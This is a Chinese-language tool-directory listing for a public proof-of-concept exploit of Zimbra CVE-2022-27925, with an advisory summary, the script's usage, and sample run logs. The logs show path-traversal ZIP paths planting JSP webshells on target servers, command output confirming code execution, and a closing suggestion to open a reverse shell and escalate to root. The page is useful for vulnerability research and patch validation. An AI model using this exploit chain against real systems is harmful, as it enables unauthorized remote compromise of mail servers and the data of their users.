Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-27925 — Zimbra CVE-2022-27925 PoC | Kitploit
工具/GitHubGitHub/josexv1/cve-2022-27925
权限提升Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubjosexv1/cve-2022-27925

CVE-2022-27925

Zimbra CVE-2022-27925 PoC

查看仓库
431924年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-27925

描述

2022年5月10日,Zimbra发布了9.0.0补丁24和8.8.15补丁31,以修复Zimbra Collaboration Suite中的多个漏洞,包括CVE-2022-27924(我们之前写过)和CVE-2022-27925。

最初,Zimbra将CVE-2022-27925称为经过身份验证的路径遍历攻击,即管理员用户能够以Zimbra账户身份将文件写入文件系统的任意目录。由于最初被认为仅是管理员攻击,NVD为其分配了CVSS基本评分7.8。后来,Volexity注意到利用此漏洞的攻击者找到了一种绕过管理权限的方法,并于2022年8月10日撰写了相关文章。这种新的认证绕过获得了一个新标识符——CVE-2022-37042。

通过结合原始路径遍历漏洞和新的认证绕过,攻击者可以通过管理员端口(默认7071)匿名远程攻破Zimbra Collaboration Suite系统。结合我们最近撰写并编写了利用代码的一个尚未修补的权限提升漏洞,这三个漏洞可在未修补系统上实现以root用户身份远程执行命令。

尽管公开公告未提及,但根据我们的分析,Zimbra Collaboration Suite Network Edition(付费版)存在漏洞,而Open Source Edition(免费版)则不受影响(因为它没有易受攻击的mboximport端点)。存在漏洞的版本如下:

Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23(及更早版本)
Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30(及更早版本)

这些漏洞(以及Zimbra中的其他漏洞)正成为野外广泛利用的目标,因此应尽快打补丁或将其下线。如果您怀疑已被入侵,Zimbra提供了在不丢失数据的情况下从零开始重建Zimbra Collaboration Suite服务器到最新补丁的步骤。

来源:https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis

用法

 _____   _           __
/__  /  (_)___ ___  / /_  _________ _
  / /  / / __ `__ \/ __ \/ ___/ __ `/
 / /__/ / / / / / / /_/ / /  / /_/ /
/____/_/_/ /_/ /_/_.___/_/   \__,_/
                    CVE-2022-27925

usage: exploit.py [-h] [-t TARGET] [-l LIST]

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        URl with protocol HTTPS
  -l LIST, --list LIST  List of targets

运行示例

root@root# python exploit.py -t zimbra.example.com
_____   _           __
/__  /  (_)___ ___  / /_  _________ _
  / /  / / __ `__ \/ __ \/ ___/ __ `/
 / /__/ / / / / / / /_/ / /  / /_/ /
/____/_/_/ /_/ /_/_.___/_/   \__,_/
                    CVE-2022-27925

[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/BQOQBN.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux

root@root# python exploit.py -l targets.txt

 _____   _           __
/__  /  (_)___ ___  / /_  _________ _
  / /  / / __ `__ \/ __ \/ ___/ __ `/
 / /__/ / / / / / / /_/ / /  / /_/ /
/____/_/_/ /_/ /_/_.___/_/   \__,_/
                    CVE-2022-27925

[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable

root@root# .

获取 root 权限!

要获取 root 权限,您可以调用一个反向 shell,然后使用 Slaper's LPE

下载工具